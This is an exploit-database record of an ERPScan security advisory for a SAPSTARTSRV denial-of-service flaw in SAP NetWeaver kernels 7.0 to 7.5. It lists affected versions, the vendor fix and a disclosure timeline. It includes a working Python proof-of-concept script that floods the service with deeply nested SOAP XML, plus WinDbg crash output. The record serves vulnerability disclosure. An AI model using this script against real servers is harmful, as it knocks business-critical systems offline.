{"id": "EDB-ID:40592", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service", "description": "", "published": "2016-10-20T00:00:00", "modified": "2016-10-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/40592", "reporter": "ERPScan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:19:32", "viewCount": 13, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "erpscan", "idList": ["ERPSCAN-16-030"]}]}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "0382df5b152d5d0ece370b37544cd2b4"}, "sourceHref": "https://www.exploit-db.com/download/40592", "sourceData": "'''\r\nApplication: SAP NetWeaver KERNEL\r\n\r\nVersions Affected: SAP NetWeaver KERNEL 7.0-7.5\r\n\r\nVendor URL: http://SAP.com\r\n\r\nBugs: Denial of Service\r\n\r\nSent: 09.03.2016\r\n\r\nReported: 10.03.2016\r\n\r\nVendor response: 10.03.2016\r\n\r\nDate of Public Advisory: 12.07.2016\r\n\r\nReference: SAP Security Note 2295238\r\n\r\nAuthor: Dmitry Yudin (ERPScan)\r\n\r\n\r\n\r\nDescription\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: [ERPSCAN-16-030] SAP NetWeaver \u2013 buffer overflow vulnerability\r\n\r\nAdvisory ID: [ERPSCAN-16-030]\r\n\r\nRisk: high\r\n\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/\r\n\r\nDate published: 12.10.2016\r\n\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Denial of Service\r\n\r\nImpact: DoS\r\n\r\nRemotely Exploitable: yes\r\n\r\nLocally Exploitable: yes\r\n\r\n\r\n\r\nCVSS Information\r\n\r\nCVSS Base Score v3: 6.5 / 10\r\n\r\nCVSS Base Vector:\r\n\r\nAV : Attack Vector (Related exploit range) Network (N)\r\n\r\nAC : Attack Complexity (Required attack complexity) Low (L)\r\n\r\nPR : Privileges Required (Level of privileges needed to exploit) None (N)\r\n\r\nUI : User Interaction (Required user participation) None (N)\r\n\r\nS : Scope (Change in scope due to impact caused to components beyond\r\nthe vulnerable component) Unchanged (U)\r\n\r\nC : Impact to Confidentiality None (N)\r\n\r\nI : Impact to Integrity Low (L)\r\n\r\nA : Impact to Availability Low (L)\r\n\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThis vulnerability allows an attacker to send a special request to the\r\nSAPSTARTSRV process port and conduct stack buffer overflow (recursion)\r\non the SAP server.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nSAP KERNEL 7.21 32-BIT 625\r\n\r\nSAP KERNEL 7.21 32-BIT UNICODE 625\r\n\r\nSAP KERNEL 7.21 64-BIT 625\r\n\r\nSAP KERNEL 7.21 64-BIT UNICODE 625\r\n\r\nSAP KERNEL 7.21 EXT 32-BIT 625\r\n\r\nSAP KERNEL 7.21 EXT 32-BIT UC 625\r\n\r\nSAP KERNEL 7.21 EXT 64-BIT 625\r\n\r\nSAP KERNEL 7.21 EXT 64-BIT UC 625\r\n\r\nSAP KERNEL 7.22 64-BIT 113\r\n\r\nSAP KERNEL 7.22 64-BIT UNICODE 113\r\n\r\nSAP KERNEL 7.22 EXT 64-BIT 113\r\n\r\nSAP KERNEL 7.22 EXT 64-BIT UC 113\r\n\r\nSAP KERNEL 7.42 64-BIT 412\r\n\r\nSAP KERNEL 7.42 64-BIT UNICODE 412\r\n\r\nSAP KERNEL 7.45 64-BIT 113\r\n\r\nSAP KERNEL 7.45 64-BIT UNICODE 113\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, install SAP Security Note 2295238\r\n\r\n\r\n6. AUTHOR\r\n\r\nDmitry Yudin (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\n7.1. Proof of Concept\r\n'''\r\n\r\nimport socket\r\nPoC = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header>\r\n <sapsess:Session\r\nxlmns:sapsess=\"http://www.sap.com/webas/630/soap/features/session/\">\r\n> \"\"\" + \"<a>\" * 100000 + \"</a>\" * 100000 + \"\"\" </sapsess:Session>\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:WW xmlns:ns1=\"urn:SAPControl\">\r\n <b></b>\r\n <e><e>\r\n </ns1:WW>\r\n </SOAP-ENV:Body>\r\n</SOAP-ENV:Envelope>\"\"\"\r\n\r\nfor i in range(1,5):\r\n sock = socket.socket()\r\n sock.connect((\"SAP_IP\", SAP_PORT))\r\n sock.send(PoC)\r\n\r\n'''\r\nWindbg exceptions\r\n\r\nsapstartsrv!soap_getutf8+0xa:\r\n00000001`4009cd2a e891f9ffff call sapstartsrv!soap_get\r\n(00000001`4009c6c0)\r\n\r\nrax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0\r\nrdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0\r\nrip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0\r\nr8=0000000134936c69 r9=0000000000000000 r10=0000000000000000\r\nr11=000000014061ee28 r12=0000000000000000 r13=000000000000270f\r\nr14=00000001409f8ba0 r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\n\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nSent: 09.03.2016\r\n\r\nReported: 10.03.2016\r\n\r\nVendor response: 10.03.2016\r\n\r\nDate of Public Advisory: 12.07.2016\r\n\r\n\r\n\r\n9. REFERENCES\r\n\r\nhttps://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/\r\n\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and\r\nanalysis of critical enterprise applications. It was acknowledged\r\nmultiple times by the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the \"The\r\nBest Server-Side Bug\" nomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at\r\n60+ prime international security conferences in 25+ countries across\r\nthe continents ( e.g. BlackHat, RSA, HITB) and conducted private\r\ntrainings for several Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP\r\nsecurity researches.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters,\r\nYahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,\r\nChinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in\r\nvarious fields of cybersecurity (from web application to ICS/SCADA\r\nsystems), gathering their experience to conduct the best SAP security\r\nresearch.\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. Founded in 2010, the company operates globally\r\nand enables large Oil and Gas, Financial, Retail and other\r\norganizations to secure their mission-critical processes. Named as an\r\n\u2018Emerging Vendor\u2019 in Security by CRN, listed among \u201cTOP 100 SAP\r\nSolution providers\u201d and distinguished by 30+ other awards, ERPScan is\r\nthe leading SAP SE partner in discovering and resolving security\r\nvulnerabilities. ERPScan consultants work with SAP SE in Walldorf to\r\nassist in improving the security of their latest solutions.\r\n\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISO's to evaluate and\r\nsecure SAP and Oracle ERP systems and business-critical applications\r\nfrom both cyberattacks and internal fraud. As a rule, our clients are\r\nlarge enterprises, Fortune 2000 companies and MSPs, whose requirements\r\nare to actively monitor and manage security of vast SAP and Oracle\r\nlandscapes on a global scale.\r\n\r\nWe \u2018follow the sun\u2019 and have two hubs, located in Palo Alto and\r\nAmsterdam, to provide threat intelligence services, continuous support\r\nand to operate local offices and partner network spanning 20+\r\ncountries around the globe.\r\n\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security\r\n'''", "osvdbidlist": [], "exploitType": "dos", "verified": false}